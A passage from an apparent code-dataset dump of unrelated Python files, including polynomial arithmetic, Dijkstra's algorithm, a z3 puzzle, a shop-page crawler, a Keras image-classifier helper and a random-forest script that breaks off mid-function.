degree(d) = degree(N) of course\n d = d * q[degree(N) - degree(D)]\n N = N - d\n endwhile\n r = N\n else\n q = 0\n r = N\n endif\n return (q, r)\n '''\n class_ = dividend.__class__\n\n # See how many times the highest order term\n # of the divisor can go into the highest order term of the dividend\n\n dividend_power = dividend.degree\n dividend_coefficient = dividend[0]\n\n divisor_power = divisor.degree\n divisor_coefficient = divisor[0]\n\n if divisor_power < 0:\n raise ZeroDivisionError\n elif dividend_power < divisor_power: # Incorrect addendum: or (dividend_power == divisor_power and divisor_coefficient > dividend_coefficient):\n # Doesn't divide at all (divisor is too big), return 0 for the quotient and the entire\n # dividend as the remainder\n quotient = class_()\n remainder = dividend\n else: # dividend_power > divisor_power: # Incorrect addendum: or (dividend_power == divisor_power and divisor_coefficient <= dividend_coefficient) , the divisor is small enough and can divide the dividend\n quotient = class_() # init the quotient array\n # init the remainder to the dividend, and we will divide it sucessively by the quotient major coefficient\n remainder = dividend\n remainder_power = dividend_power\n remainder_coefficient = dividend_coefficient\n quotient_power = remainder_power - divisor_power\n\n # Compute how many times the highest order term in the divisor goes into the dividend\n while quotient_power >= 0 and remainder.coefficients != [0]: # Until there's no remainder left (or the remainder cannot be divided anymore by the divisor)\n quotient_coefficient = remainder_coefficient / divisor_coefficient # in GF256, the division here can be interchanged with multiplication, it doesn't change the result.\n q = class_( [quotient_coefficient] + [0] * quotient_power ) # construct an array with only the quotient major coefficient (we divide the remainder only with the major coeff)\n quotient[quotient_power] = quotient_coefficient # add the coeff to the full quotient. Equivalent to: quotient = quotient + q\n remainder = remainder - q*divisor # divide the remainder with the major coeff quotient multiplied by the divisor, this gives us the new remainder\n remainder_power = remainder.degree # compute the new remainder degree\n remainder_coefficient = remainder[0] # Compute the new remainder coefficient\n quotient_power = remainder_power - divisor_power\n return quotient, remainder\n\n # def __olddivmod__(dividend, divisor):\n # '''Implements polynomial long-division recursively. I know this is\n # horribly inefficient, no need to rub it in. I know it can even throw\n # recursion depth errors on some versions of Python.\n\n # However, not being a math person myself, I implemented this from my\n # memory of how polynomial long division works. It's straightforward and\n # doesn't do anything fancy. There's no magic here.\n # '''\n # class_ = dividend.__class__\n\n # # See how many times the highest order term\n # # of the divisor can go into the highest order term of the dividend\n\n # dividend_power = dividend.degree\n # dividend_coefficient = dividend.coefficients[0]\n\n # divisor_power = divisor.degree\n # divisor_coefficient = divisor.coefficients[0]\n\n # quotient_power = dividend_power - divisor_power\n # if quotient_power < 0:\n # # Doesn't divide at all, return 0 for the quotient and the entire\n # # dividend as the remainder\n # return class_([0]), dividend\n\n # # Compute how many times the highest order term in the divisor goes\n # # into the dividend\n # quotient_coefficient = dividend_coefficient / divisor_coefficient\n # quotient = class_( [quotient_coefficient] + [0] * quotient_power )\n\n # remainder = dividend - quotient * divisor\n\n # if remainder.coefficients == [0]:\n # # Goes in evenly with no remainder, we're done\n # return quotient, remainder\n\n # # There was a remainder, see how many times the remainder goes into the\n # # divisor\n # morequotient, remainder = divmod(remainder, divisor)\n # return quotient + morequotient, remainder\n\n def __eq__(self, other):\n return self.coefficients == other.coefficients\n def __ne__(self, other):\n return self.coefficients != other.coefficients\n def __hash__(self):\n return hash(self.coefficients)\n\n def __repr__(self):\n n = self.__class__.__name__\n return \"%s(%r)\" % (n, self.coefficients)\n def __str__(self):\n buf = _StringIO()\n l = len(self) - 1\n for i, c in enumerate(self.coefficients):\n if not c and i > 0:\n continue\n power = l - i\n if c == 1 and power != 0:\n c = \"\"\n if power > 1:\n buf.write(\"%sx^%s\" % (c, power))\n elif power == 1:\n buf.write(\"%sx\" % c)\n else:\n buf.write(\"%s\" % c)\n buf.write(\" + \")\n return buf.getvalue()[:-3]\n\n def evaluate(self, x):\n '''Evaluate this polynomial at value x, returning the result (which is the sum of all evaluations at each term).'''\n # Holds the sum over each term in the polynomial\n #c = 0\n\n # Holds the current power of x. This is multiplied by x after each term\n # in the polynomial is added up. Initialized to x^0 = 1\n #p = 1\n\n #for term in self.coefficients[::-1]:\n # c = c + term * p\n # p = p * x\n #return c\n\n # Faster alternative using Horner's Scheme\n y = self[0]\n for i in _range(1, len(self)):\n y = y * x + self.coefficients[i]\n return y\n\n def evaluate_array(self, x):\n '''Simple way of evaluating a polynomial at value x, but here we return both the full array (evaluated at each polynomial position) and the sum'''\n x_gf = self.coefficients[0].__class__(x)\n arr = [self.coefficients[-i]*x_gf**(i-1) for i in _range(len(self), 0, -1)]\n # if x == 1: arr = sum(self.coefficients)\n return arr, sum(arr)\n\n def derive(self):\n '''Compute the formal derivative of the polynomial: sum(i*coeff[i] x^(i-1))'''\n #res = [0] * (len(self)-1) # pre-allocate the list, it will be one item shorter because the constant coefficient (x^0) will be removed\n #for i in _range(2, len(self)+1): # start at 2 to skip the first coeff which is useless since it's a constant (x^0) so we +1, and because we work in reverse (lower coefficients are on the right) so +1 again\n #res[-(i-1)] = (i-1) * self[-i] # self[-i] == coeff[i] and i-1 is the x exponent (eg: x^1, x^2, x^3, etc.)\n #return Polynomial(res)\n\n # One liner way to do it (also a bit faster too)\n #return Polynomial( [(i-1) * self[-i] for i in _range(2, len(self)+1)][::-1] )\n # Another faster version\n L = len(self)-1\n return Polynomial( [(L-i) * self[i] for i in _range(0, len(self)-1)] )\n\n def get_coefficient(self, degree):\n '''Returns the coefficient of the specified term'''\n if degree > self.degree:\n return 0\n else:\n return self.coefficients[-(degree+1)]\n \n def __iter__(self):\n return iter(self.coefficients)\n #for item in self.coefficients:\n #yield item\n\n def __getitem__(self, slice):\n return self.coefficients[slice] # TODO: should return 0 for coefficients higher than the degree (but debugging would be harder...)\n\n def __setitem__(self, key, item):\n '''Set or create a coefficient value, the key being the coefficient order (not the internal list index)'''\n if key < self.length:\n self.coefficients[-key-1] = item\n else:\n self.coefficients = [item] + [0]*(key-self.length) + list(self.coefficients)\n self.length = len(self.coefficients)\n self.degree = self.length-1\n","sub_path":"src/unireedsolomon/polynomial.py","file_name":"polynomial.py","file_ext":"py","file_size_in_byte":20578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"521845627","text":"\n\"\"\"This module will finish the whole SFC deployment operation\"\"\"\n\nimport os\nimport shutil\n\nfrom operation.create import create\nfrom operation.delete import delete\n#from operation.update import update\n\nfrom parse_file.parse_request import jsonparser\nfrom config import abs_dir\n\ndef deploy(template_sfc_file):\n \"\"\"The function executes SFC deployment operation.\n\n :param template_sfc_file: the filename of sfc to be deployed\n \"\"\"\n req = jsonparser(template_sfc_file)\n operation = req.get_sfc_operation()\n sfc_name = req.get_sfc_name()\n if operation == \"create\":\n sfc_file = sfc_name + \".json\"\n shutil.copyfile(abs_dir + \"json/sfc/\"+template_sfc_file, abs_dir + \"json/sfc/\"+sfc_file)\n create(sfc_file)\n\n elif operation == \"delete\":\n sfc_file = sfc_name + \".json\"\n delete(sfc_file)\n os.remove(abs_dir + \"json/sfc/\" + sfc_file)\n for vnfd_description_file in os.listdir(abs_dir + \"json/tacker/vnfd/\"):\n if sfc_name in vnfd_description_file:\n os.remove(abs_dir + \"json/tacker/vnfd/\" + vnfd_description_file)\n for vnffgd_description_file in os.listdir(abs_dir + \"json/tacker/vnffgd/\"):\n if sfc_name in vnffgd_description_file:\n os.remove(abs_dir + \"json/tacker/vnffgd/\" + vnffgd_description_file)\n\n else:\n sfc_file = sfc_name + \".json\"\n compare_output_file = compare_file(template_sfc_file, sfc_file)\n update(compare_output_file)\n\n \nif __name__ == '__main__':\n deploy(\"template_sfc.json\")\n","sub_path":"deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"436976870","text":"from z3 import *\n\n# Create 3 integer variables\ndog, cat, mouse = Ints('dog cat mouse')\ns = Solver()\ns.add(dog >= 1, # at least one dog\n cat >= 1, # at least one cat\n mouse >= 1, # at least one mouse\n # we want to buy 100 animals\n dog + cat + mouse == 100,\n # We have 100 dollars (10000 cents):\n # dogs cost 15 dollars (1500 cents), \n # cats cost 1 dollar (100 cents), and \n # mice cost 25 cents \n 1500 * dog + 100 * cat + 25 * mouse == 10000)\n\nprint(s)\n\nprint(s.check())\n\nm = s.model()\n\nprint(\"m:\", m)\n\nprint(\"x = %s\" % m[dog])\n\nprint(\"traversing model...\")\nfor d in m.decls():\n print(\"%s = %s\" % (d.name(), m[d]))\n","sub_path":"SMT-based Model Checking/z3/simpleMath.py","file_name":"simpleMath.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"569503789","text":"import csv\nimport sys\nimport os\n\ndef create_result_csv(root_path):\n queries_result = {}\n queries_list = []\n total_result = []\n\n # read log result\n for dir in os.listdir(root_path):\n if os.path.isdir(os.path.join(root_path, dir)):\n with open(os.path.join(os.path.join(root_path, dir), \"result.csv\"), 'rb') as f:\n csv_read = csv.reader(f)\n total_time_per_round = 0\n for line in csv_read:\n total_time_per_round = total_time_per_round + int(line[1])\n if not queries_result.has_key(line[0]) and line[0] is not \"\":\n if line[2] == \"Success\":\n queries_result[line[0]] = [line[1]]\n else:\n queries_result[line[0]] = [\"-\" + line[1]]\n queries_list.append(line[0])\n else:\n if line[2] == \"Success\":\n queries_result[line[0]].append(line[1])\n else:\n queries_result[line[0]].append(\"-\" + line[1])\n\n total_result.append(total_time_per_round)\n\n # add all results into one file\n final_result_file = os.path.join(root_path, \"final_result.csv\")\n with open(final_result_file,'wb') as f:\n csv_write = csv.writer(f)\n csv_head = [\"query\"]\n csv_tail = [\"total\"]\n for dir in os.listdir(root_path):\n if os.path.isdir(os.path.join(root_path, dir)):\n csv_head.append(dir)\n csv_head.append(\"average\")\n csv_write.writerow(csv_head)\n\n for query in queries_list:\n line = []\n total_time_per_query = 0\n line.append(query)\n for runtime in queries_result.get(query):\n line.append(runtime)\n total_time_per_query = total_time_per_query + abs(int(runtime))\n average_time_per_query = total_time_per_query / (len(line) - 1)\n line.append(average_time_per_query)\n csv_write.writerow(line)\n\n total_time = 0\n for total_time_per_round in total_result:\n csv_tail.append(total_time_per_round)\n total_time = total_time + int(total_time_per_round)\n average_time_per_round = total_time / (len(csv_tail) - 1)\n csv_tail.append(average_time_per_round)\n csv_write.writerow(csv_tail)\n\nif __name__ == '__main__':\n args = sys.argv\n if len(args) < 2:\n exit(1)\n result_path = args[1]\n create_result_csv(result_path)","sub_path":"tools/tpch/tpch_script/tpch/merge_csv_result.py","file_name":"merge_csv_result.py","file_ext":"py","file_size_in_byte":2592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"272340266","text":"import heapq\nimport math\ngraph = {'A': {'B':5, 'C':1}, #图用字典表示\n 'B': {'A':5, 'C':2, 'D':1}, \n 'C': {'A':1, 'B':2, 'D':4, 'E':8}, \n 'D': {'B':1, 'C':4, 'E':3, 'F':6}, \n 'E':{'C':8, 'D':3}, \n 'F':{'D':6}}\n\ndef init_distance(graph, s):\n\tdistance = {s:0}\n\tfor i in graph.keys():\n\t\tif i is not s:\n\t\t\tdistance[i] = math.inf\n\treturn distance \n\ndef short_path(graph, s):\n\tpqueue = []\n\theapq.heappush(pqueue, (0, s))\n\tparent = {s:None}\n\tdistance = init_distance(graph, s)\n\tseen = []\n\twhile pqueue:\n\t\tdist, vertex = heapq.heappop(pqueue)\n\t\tseen.append(vertex)\n\t\tfor w in graph[vertex].keys():\n\t\t\tif w not in seen:\n\t\t\t\tif dist + graph[vertex][w] < distance[w]:\n\t\t\t\t\tdistance[w] = dist + graph[vertex][w]\n\t\t\t\t\theapq.heappush(pqueue, (dist+graph[vertex][w], w))\n\t\t\t\t\tparent[w] = vertex\n\treturn parent, distance\nparent, distance = short_path(graph, 'A')\n","sub_path":"shortest_path.py","file_name":"shortest_path.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"165584698","text":"#Faça um programa em Python que obtenha o valor de uma\n#compra, calcular e mostrar o valor da compra considerando o\n#desconto, conforme descrito abaixo:\n#para compras acima de R$ 200 a loja dá um desconto de 20%\n#para as abaixo disso não tem desconto, mostre o valor da compra.\n\ncompra = float(input('Informa o valor da sua compra: '))\nif compra > 200:\n des = compra - (compra * 20 / 100)\n print('O valor da sua compra com 20% de desconto foi de R${}'.format(des))\nelse:\n print('O valor da sua compra foi baixo e não terá desconto.')\n","sub_path":"Programação de Computadores/Python Exercicios Resolvidos/aula 5/aula 5/ex01aula05.py","file_name":"ex01aula05.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"81843578","text":"import pkgutil\n\n\ndef import_class(name):\n import importlib\n module_name, class_name = name.rsplit(\".\", 1)\n module = importlib.import_module('.', module_name)\n return getattr(module, class_name)\n\n\ndef import_model(app_name, name):\n from django.apps import apps as django_apps\n if isinstance(name, str):\n result = None\n if \".\" in name: # \"hotel.Channel\"\n result = django_apps.get_model(name)\n if not result:\n try:\n result = django_apps.get_model(app_name, name.lower())\n except Exception:\n pass\n if not result:\n try:\n result = import_class(\"%s.models.%s\" % (app_name, name.capitalize()))\n except Exception:\n pass\n\n if result:\n return result\n raise Exception(f\"Cannot import model by {app_name} {name}\")\n\n\nclass ModuleProxyCache(dict):\n def __missing__(self, key):\n if '.' not in key:\n return __import__(key)\n\n module_name, class_name = key.rsplit('.', 1)\n\n module = __import__(module_name, {}, {}, [class_name])\n handler = getattr(module, class_name)\n\n # We cache a NoneType for missing imports to avoid repeated lookups\n self[key] = handler\n\n return handler\n\n\n_cache = ModuleProxyCache()\n\n\ndef import_string(path):\n \"\"\"\n Path must be module.path.ClassName\n\n >>> cls = import_string('sentry.models.Group')\n \"\"\"\n result = _cache[path]\n return result\n\n\ndef import_submodules(context, root_module, path):\n \"\"\"\n Import all submodules and register them in the ``context`` namespace.\n\n >>> import_submodules(locals(), __name__, __path__)\n \"\"\"\n for loader, module_name, is_pkg in pkgutil.walk_packages(path, root_module + '.'):\n # this causes a Runtime error with model conflicts\n # module = loader.find_module(module_name).load_module(module_name)\n module = __import__(module_name, globals(), locals(), ['__name__'])\n for k, v in vars(module).items():\n if not k.startswith('_'):\n context[k] = v\n context[module_name] = module\n\n\ndef import_sub_classes(context, root_module, path):\n \"\"\"\n Import all submodules and register them in the ``context`` namespace.\n\n >>> import_sub_classes(locals(), __name__, __path__)\n \"\"\"\n for loader, module_name, is_pkg in pkgutil.walk_packages(path, root_module + '.'):\n module = __import__(module_name, globals(), locals(), ['__name__'])\n for k, v in vars(module).items():\n is_class = hasattr(v, '__name__')\n has_module = hasattr(v, \"__module__\")\n if not k.startswith('_') and is_class and has_module:\n name = v.__name__\n if name[0:1].isupper() and v.__module__.startswith(root_module):\n context[k] = v\n context[module_name] = module\n","sub_path":"redmin/utils/imports.py","file_name":"imports.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"199732867","text":"# coding: utf-8\nfrom bs4 import BeautifulSoup\nimport requests\nimport time\nimport re\n\ndef get_url(urls, bs):\n for link in bs.find_all(name='a'):\n if len(urls) > 100:\n break\n url = link.get('href')\n match = re.search(r'^/shop/[0-9]*$', str(url))\n if match:\n urls.add(match.group())\n\ndef get_info(bs):\n try:\n info = bs.find(attrs = {'class': 'basic-info'})\n name = info.find(attrs = {'class': 'shop-name'}).text.split('\\n')[1]\n address = ''.join([s.strip(' ')for s in info.find(attrs = {'class': 'expand-info address'}).text.split('\\n')])\n print(name, address)\n except:\n pass\n\ndef main():\n domain = 'http://www.dianping.com'\n urls = set(['/shop/1721578', '/shop/14155301', ])\n while len(urls) > 0:\n r = requests.get(domain+urls.pop(), headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0'})\n bs = BeautifulSoup(r.text)\n get_url(urls, bs)\n get_info(bs)\n time.sleep(4)\n\nif __name__ == '__main__':\n main()\n","sub_path":"other/crawler_dianping.py","file_name":"crawler_dianping.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"67845913","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# PROGRAMMER: Vittorio Nardone\n# DATE CREATED: 12/13/2018\n# REVISED DATE: <=(Date Revised - if any)\n# PURPOSE: Train a new deep neural network on a image dataset and save\n# the model as a checkpoint.\n# Use a trained network to predict the class for an input image\n# loading checkpoint model\n# Pre-trained networks are used (VGG/Densenet/AlexNet/ResNet)\n#\n\nfrom keras import applications\nfrom keras import layers\nfrom keras import models\nfrom keras import optimizers\n\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.preprocessing import image\nfrom keras import backend as K\n\nfrom collections import OrderedDict\nimport numpy as np\nimport os\nimport json\nfrom time import time, gmtime, strftime\nfrom PIL import Image\n\nimport helper\n\ndef supported_models():\n ''' Return a list of supported models architecture\n '''\n return ['densenet121', 'densenet169', 'densenet201',\n 'vgg16', 'vgg19',\n 'mobilenet',\n 'mobilenetv2',\n 'resnet50',\n 'nasnetmobile']\n\ndef supported_optimizer():\n ''' Return a list of supported optimizer\n '''\n return ['SGD','Adam']\n\ndef gpu_available():\n ''' Return True if Cuda/GPU is available on current system\n '''\n avail = False\n if len(K.tensorflow_backend._get_available_gpus()) > 0:\n avail = True\n return avail\n\ndef get_preprocess_function(arch):\n \"\"\"\n Return preprocess function of specified architecture model.\n \"\"\"\n if arch == 'mobilenet':\n pf = applications.mobilenet.preprocess_input\n elif arch == 'mobilenetv2':\n pf = applications.mobilenet_v2.preprocess_input \n elif arch in ['densenet121', 'densenet169', 'densenet201']:\n pf = applications.densenet.preprocess_input\n elif arch == 'vgg16':\n pf = applications.vgg16.preprocess_input\n elif arch == 'vgg19':\n pf = applications.vgg19.preprocess_input\n elif arch == 'resnet50':\n pf = applications.resnet50.preprocess_input\n elif arch == 'nasnetmobile':\n pf = applications.nasnet.preprocess_input\n else:\n raise Exception(\"Unknow architecture: {}\".format(arch)) \n\n return pf\n\ndef create_new_model(arch):\n \"\"\"\n Create a new pretrained model with specified architecture.\n Parameters:\n arch - model architecture\n Returns:\n model - the model object\n \"\"\"\n # Model definition\n if arch in supported_models():\n if arch == 'mobilenet':\n model = applications.mobilenet.MobileNet(weights='imagenet', include_top=False, input_shape=(224,224,3))\n elif arch == 'mobilenetv2':\n model = applications.mobilenet_v2.MobileNetV2(weights='imagenet', include_top=False, input_shape=(224,224,3))\n elif arch == 'densenet121':\n model = applications.densenet.DenseNet121(weights='imagenet', include_top=False, input_shape=(224,224,3))\n elif arch == 'densenet169':\n model = applications.densenet.DenseNet169(weights='imagenet', include_top=False, input_shape=(224,224,3))\n elif arch == 'densenet201':\n model = applications.densenet.DenseNet201(weights='imagenet', include_top=False, input_shape=(224,224,3))\n elif arch == 'vgg16':\n model = applications.vgg16.VGG16(weights='imagenet', include_top=False, input_shape=(224,224,3))\n elif arch == 'vgg19':\n model = applications.vgg19.VGG19(weights='imagenet', include_top=False, input_shape=(224,224,3))\n elif arch == 'resnet50':\n model = applications.resnet50.ResNet50(weights='imagenet', include_top=False, input_shape=(224,224,3))\n elif arch == 'nasnetmobile':\n model = applications.nasnet.NASNetMobile(weights='imagenet', include_top=False, input_shape=(224,224,3))\n else:\n raise Exception(\"Unknow architecture: {}\".format(arch))\n\n return model\n\n\ndef create_classifier(base_model, hidden_units, class_count, bn = False, bn_momentum = 0.99):\n \"\"\"\n Create classifier according to specified parameters and return a new model.\n Parameters:\n base_model - the model object\n hiddend_units - int array with number of elements for each hidden layer\n class_count - number of output layer elements\n Returns:\n model\n \"\"\"\n input_count = int(base_model.output.shape[-1])\n\n # Input and output layers\n hidden_units.insert(0, input_count)\n hidden_units.append(class_count)\n\n model = models.Sequential()\n model.add(base_model)\n model.add(layers.Flatten())\n \n iterations = len(hidden_units)\n\n for idx in range(iterations):\n if idx < iterations-1:\n model.add(layers.Dense(hidden_units[idx], activation='relu'))\n if bn:\n model.add(layers.BatchNormalization(momentum = bn_momentum))\n else:\n model.add(layers.Dense(hidden_units[idx], activation='softmax'))\n\n return model\n\n\ndef create_optimizer(optimization = 'SGD', learning_rate = 0.05):\n if optimization == 'SGD':\n optimizer = optimizers.SGD(lr=learning_rate)\n elif optimization == 'Adam':\n optimizer = optimizers.Adam(lr=learning_rate)\n else:\n raise Exception(\"Unknow optimization algorithm\")\n return optimizer\n\ndef create_and_train(data_folder,\n training_subfolder = '/train/',\n validation_subfolder = '/valid/',\n batch_size = 64,\n arch = 'densenet121', hidden_units = [], dropout = 0, bn = False,\n epochs = 10, learning_rate = 0.05, accuracy = 0.8, optimization = 'SGD',\n full_net_epochs = 0):\n \"\"\"\n Create a model and train it according to specified parameters.\n Parameters:\n data_folder - root image directory\n training_subfolder - training images subfolder\n validation_subfolder - validation images subfolder\n arch - model architecture\n hiddend_units - int array with number of elements for each classifier hidden layer\n dropout - dropout probability in classifier\n epochs - number of epochs to run\n learning_rate - learning rate to be used in optimizer\n accuracy - validation accuracy threshold\n optimization - set optimization algorithm (Adam/SGD)\n bn - add Batch Normalization layers in classifier\n full_net_epochs - Retrain all elements of network after classifier training for specified epochs\n Returns:\n model - the trained model object\n \"\"\"\n # Set data folder to current directory if empty\n if (data_folder == ''):\n data_folder = '.'\n\n \n # Create model\n print(\"Model architecture: '{}'\".format(arch), \"- GPU Mode: \", gpu_available())\n base_model = create_new_model(arch) \n \n # Dataset loading\n pf = get_preprocess_function(arch)\n \n train_generator = ImageDataGenerator(\n rotation_range=20,\n width_shift_range=0.2,\n height_shift_range=0.2,\n horizontal_flip=True, \n preprocessing_function=pf\n ).flow_from_directory(os.path.normpath(data_folder + training_subfolder), target_size=(224, 224),\n class_mode='categorical', batch_size=batch_size)\n\n valid_generator = ImageDataGenerator(\n preprocessing_function=pf\n ).flow_from_directory(os.path.normpath(data_folder + validation_subfolder), target_size=(224, 224),\n class_mode='categorical', batch_size=batch_size)\n\n # Create a new Classifier\n model = create_classifier(base_model, hidden_units, len(set(train_generator.classes)), bn=bn)\n\n for layer in base_model.layers:\n layer.trainable = False\n\n # Optimizer definition\n optimizer = create_optimizer(optimization = optimization,\n learning_rate = learning_rate)\n\n model.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['acc'])\n\n print(model.summary())\n\n print(\"Learning rate:\", learning_rate, \"- Criterion: CrossEntropyLoss\", \"- Optimizer:\", optimization)\n print(\"Batch Size: {} - Training stop after {} epoch(s)\".format(batch_size, epochs), end = ' ')\n if accuracy < 1:\n print(\"or validation accuracy > {}%\".format(accuracy*100), end = ' ')\n print()\n\n epoch_count = 0\n for e in range(epochs):\n print(\"\\n** Training epoch {}/{} BEGIN **\".format(e, epochs))\n history = model.fit_generator(generator=train_generator,\n steps_per_epoch=train_generator.n//train_generator.batch_size,\n validation_data=valid_generator,\n validation_steps=valid_generator.n//valid_generator.batch_size,\n epochs=1,\n use_multiprocessing = True,\n workers = 4)\n print(\"** Training epoch {}/{} END **\".format(e, epochs)) \n epoch_count += 1\n if history.history['val_acc'][0] > accuracy:\n break\n \n if full_net_epochs >0:\n print(\"\\n** Full network training **\")\n\n for layer in base_model.layers:\n layer.trainable = True\n\n # Optimizer definition\n optimizer = create_optimizer(optimization = optimization,\n learning_rate = learning_rate)\n\n model.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['acc'])\n\n history = model.fit_generator(generator=train_generator,\n steps_per_epoch=train_generator.n//train_generator.batch_size,\n validation_data=valid_generator,\n validation_steps=valid_generator.n//valid_generator.batch_size,\n epochs=full_net_epochs,\n use_multiprocessing = True,\n workers = 4)\n \n \n model.config = { 'backend' : 'keras',\n 'arch' : arch,\n 'hidden_units' : hidden_units,\n 'dropout' : dropout,\n 'label_map': dict((v,k) for k,v in train_generator.class_indices.items()),\n 'train_epoch' : epoch_count + full_net_epochs,\n 'learning_rate' : learning_rate,\n 'bn' : bn,\n }\n \n return model\n\ndef save_model_config(model, filename):\n \"\"\"\n Save model configuration to json file\n \"\"\"\n with open(filename, 'w') as fp:\n json.dump(model.config, fp)\n \ndef load_model_config(filename): \n \"\"\"\n Load model configuration from json file and return it\n \"\"\"\n with open(filename, 'r') as fp:\n data = json.load(fp) \n return data\n\ndef save_checkpoint(model, destination_folder, filename = \"\"):\n \"\"\"\n Save model checkpoint to file.\n Parameters:\n model - the model object\n destination_folder - destination folder of checkpoint file\n filename - checkpoint filename\n Returns:\n filename - checkpoint filename\n \"\"\"\n # Compose filename\n if filename == \"\":\n filename = \"cp_{}_e{}_lr{}.h5\".format(model.config['arch'],\n model.config['train_epoch'],\n model.config['learning_rate'])\n \n if destination_folder == \"\":\n destination_folder = '.'\n\n full_filename = os.path.normpath(\"{}/{}\".format(destination_folder,filename))\n model.save(full_filename) \n\n config_file = full_filename.rsplit('.', 1)[0] + '.json'\n save_model_config(model, config_file)\n\n print(\"\\n** Model checkpoint saved to: '{}'\".format(full_filename))\n return filename\n\ndef create_model_from_checkpoint(filename):\n \"\"\"\n Create new model from checkpoint file.\n Parameters:\n filename - checkpoint filename\n Returns:\n model - the model object\n \"\"\"\n model = models.load_model(filename)\n\n config_file = filename.rsplit('.', 1)[0] + '.json'\n \n if os.path.isfile(config_file): \n model.config = load_model_config(config_file)\n else:\n raise Exception(\"Configuration file '{}' not found!\".format(config_file))\n \n model.pf = get_preprocess_function(model.config['arch'])\n \n return model \n\n\n# Predict the class (or classes) of an image\ndef predict(image_path, model, topk=5):\n ''' Predict the class (or classes) of an image using a trained deep learning model.'''\n \n #Load and pre-process image\n img = image.load_img(image_path, target_size=(224, 224))\n img_np = image.img_to_array(img)\n img_np = np.expand_dims(img_np, axis=0)\n img_np = model.pf(img_np) \n \n #Predict!\n ps = model.predict(img_np)[0]\n \n #Get topk\n classes_idx = np.argsort(ps)[::-1][:topk]\n probs = [ps[i] for i in classes_idx] \n \n classes = [model.config['label_map'][str(k)] for k in classes_idx] \n \n return probs, classes \n\n\n\n# Set TensorFlow log level (hide debug messages)\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' \n\n# TODO: add module sanity check\nif __name__ == \"__main__\":\n pass\n","sub_path":"mainproject-classify-flower-images/model_helper_keras.py","file_name":"model_helper_keras.py","file_ext":"py","file_size_in_byte":13130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"372223297","text":"# -*- coding: utf-8 -*-\n\"\"\"\nFunction RANDOM FOREST.\nCreated by : BenMobility\nCreated on : 22.11.2020\nModified on : 12.12.2020\n\nUPDATE : \n 1. added pickle \n 2. added the title for the performance indicators, hyperparameter tuning.\n 3. make the code as function itself and add a sys path to get a folder\n 4. delete the rf_helpers and add train_test_split function here\n\"\"\"\n#usual imports\nimport pandas as pd\nfrom pprint import pprint\nimport pickle\nimport numpy as np\n\n# scikitlearn helpers\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import RandomizedSearchCV\n\n# split function\ndef train_test_split(data, n_train):\n \"\"\"\n SPLIT TRAIN AND TEST sets from a univariate dataset\n\n Parameters\n ----------\n data : n x d dataframe pandas\n it contains the label and the features of the dataset.\n n_train : scalar\n tells how much rows you want to keep for the train set\n\n Returns\n -------\n TYPE\n train dataset from the first row to the scalar input.\n TYPE\n test dataset starts from the scalar input row until the end of the \n original dataset.\n \"\"\"\n return data[:n_train, :], data[n_train:, :]\n\n\n#random forest prediction\ndef rf_predict(nbday, tuning = True):\n \"\"\"\n Parameters\n ----------\n tuning : True / False, optional\n If tuning it is true, the function will go through the hyperparameter\n tuning with already selected parameter grid. If false, it will select\n the pickle with the provided number of days mem. The default is True.\n nbdays : integer\n Number of days memory between [2, 10, 50, 100, 150]\n\n Returns\n -------\n y_predicted : n x 1, integers\n It returns the predicted values of a 80/20 split from the prepro data\n \"\"\"\n #check nbdays\n check = [2, 10, 50, 100, 150]\n if nbday not in check:\n print('\\nWrong number of days!\\n')\n print('Please choose between: 2, 10, 50, 100, 150')\n \n if nbday in check:\n #filename\n filename = 'Models\\RF\\RF_pickle{}'.format(nbday)\n \n #add one to nb of days to consider the first consider as the label\n nbdays = nbday + 1\n # load the dataset\n PATH = \"Data\\preprocessed.csv\"\n data = pd.read_csv(PATH, header=0, index_col=0)\n data = data.to_numpy()\n data = data[:,:nbdays]\n \n #train/test split ratio\n ratio = 0.80\n n_train = int(len(data) * ratio)\n train, test = train_test_split(data, n_train)\n \n #call the classifier\n rf = RandomForestClassifier(random_state = 17)\n \n if tuning == True:\n \n # Number of trees in random forest\n n_estimators = [int(x) for x in np.linspace(start = 1000, stop = 2000, num = 3)]\n # Number of features to consider at every split\n max_features = ['auto']\n # Maximum number of levels in tree\n max_depth = [int(x) for x in np.linspace(10, 50, num = 5)]\n max_depth.append(None)\n # Minimum number of samples required to split a node\n min_samples_split = [8, 10, 12]\n # Minimum number of samples required at each leaf node\n min_samples_leaf = [3, 4, 5]\n # Method of selecting samples for training each tree\n bootstrap = [True]\n \n # Create the random grid\n random_grid = {'n_estimators': n_estimators,\n 'max_features': max_features,\n 'max_depth': max_depth,\n 'min_samples_split': min_samples_split,\n 'min_samples_leaf': min_samples_leaf,\n 'bootstrap': bootstrap}\n print()\n print('Random grid for RF:\\n')\n pprint(random_grid)\n \n # Random search of parameters, using 3 fold cross validation, \n # search across 100 different combinations, and use all available cores\n rf_random = RandomizedSearchCV(estimator=rf, param_distributions=random_grid,\n n_iter = 100, scoring='f1_weighted', \n cv = 3, 